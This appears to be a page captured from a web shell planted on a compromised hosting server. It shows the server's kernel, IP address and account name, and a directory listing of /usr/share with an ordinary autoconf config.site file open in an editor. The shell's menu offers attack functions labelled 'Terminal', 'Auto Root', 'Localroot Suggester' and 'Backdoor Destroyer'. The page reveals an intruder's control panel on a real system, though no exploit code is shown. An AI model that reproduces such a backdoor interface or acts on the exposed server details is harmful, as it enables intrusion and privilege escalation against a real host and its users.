Linux server193.iseencloud.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
Server IP : 43.242.226.197 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : amazingd
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
Delete
Unzip
Name
Size
Permission
Date
Action
Modules
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
aclocal
[ DIR ]
drwxr-xr-x
2026-05-02 02:46
aclocal-1.16
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
adobe
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
alt-php-xray-tasks
[ DIR ]
drwxr-xr-x
2026-05-05 14:35
autoconf
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
automake-1.16
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
awk
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
bash-completion
[ DIR ]
drwxr-xr-x
2025-07-21 16:25
bison
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
cmake
[ DIR ]
drwxr-xr-x
2026-05-01 11:46
cracklib
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
crypto-policies
[ DIR ]
drwxr-xr-x
2026-05-01 12:37
emacs
[ DIR ]
drwxr-xr-x
2026-05-01 11:46
enchant
[ DIR ]
drwxr-xr-x
2026-05-02 03:23
file
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
fontconfig
[ DIR ]
drwxr-xr-x
2026-05-01 11:46
fonts
[ DIR ]
drwxr-xr-x
2026-05-02 03:23
ghostscript
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
git-core
[ DIR ]
drwxr-xr-x
2026-05-02 02:51
gnupg
[ DIR ]
drwxr-xr-x
2026-05-01 11:45
groff
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
i18n
[ DIR ]
drwxr-xr-x
2026-02-17 11:01
icu
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
imunify360
[ DIR ]
drwxr-xr-x
2026-05-02 03:21
info
[ DIR ]
drwxr-xr-x
2026-05-05 09:43
l.v.e-manager
[ DIR ]
drwxr-xr-x
2026-05-02 03:20
libgpg-error
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
libtool
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
locale
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
lve-stats
[ DIR ]
drwxr-xr-x
2026-05-02 02:53
man
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
misc
[ DIR ]
drwxr-xr-x
2026-05-01 08:28
modulefiles
[ DIR ]
drwxr-xr-x
2025-09-21 09:06
myspell
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
mysql
[ DIR ]
drwxr-xr-x
2026-05-01 12:00
nano
[ DIR ]
drwxr-xr-x
2026-05-01 11:46
pam.d
[ DIR ]
drwxr-xr-x
2025-09-03 03:47
passenger
[ DIR ]
drwxr-xr-x
2026-05-02 03:21
perl5
[ DIR ]
drwxr-xr-x
2026-05-01 12:26
python-cllib
[ DIR ]
drwxr-xr-x
2026-05-02 02:51
screen
[ DIR ]
drwxr-xr-x
2026-05-01 11:44
snmp
[ DIR ]
drwxr-xr-x
2026-05-02 03:23
tabset
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
tcl8
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
tcl8.6
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
terminfo
[ DIR ]
drwxr-xr-x
2025-09-21 09:24
vim
[ DIR ]
drwxr-xr-x
2026-05-01 12:02
xml
[ DIR ]
drwxr-xr-x
2026-05-01 12:29
zoneinfo
[ DIR ]
drwxr-xr-x
2026-05-01 12:37
zsh
[ DIR ]
drwxr-xr-x
2026-01-28 08:27
config.site
880
B
-rw-r--r--
2025-09-21 12:23
magic
1.12
MB
-rw-r--r--
2024-04-03 12:38
Save
Rename
# This is the config.site file to satisfy FHS defaults when installing below # /usr. # # You may override this file by your config.site using the CONFIG_SITE env # variable. # # Note: This file includes also RHEL/Fedora fix for installing libraries into # "/lib/lib64" on 64bit systems. if test -n "$host"; then # skip when cross-compiling return 0 fi if test "$prefix" = /usr \ || { test "$prefix" = NONE && test "$ac_default_prefix" = /usr ; } then test "$sysconfdir" = '${prefix}/etc' && sysconfdir=/etc test "$sharedstatedir" = '${prefix}/com' && sharedstatedir=/var test "$localstatedir" = '${prefix}/var' && localstatedir=/var ARCH=`uname -m` for i in x86_64 ppc64 s390x aarch64; do if test $ARCH = $i; then test "$libdir" = '${exec_prefix}/lib' && libdir='${exec_prefix}/lib64' break fi done fi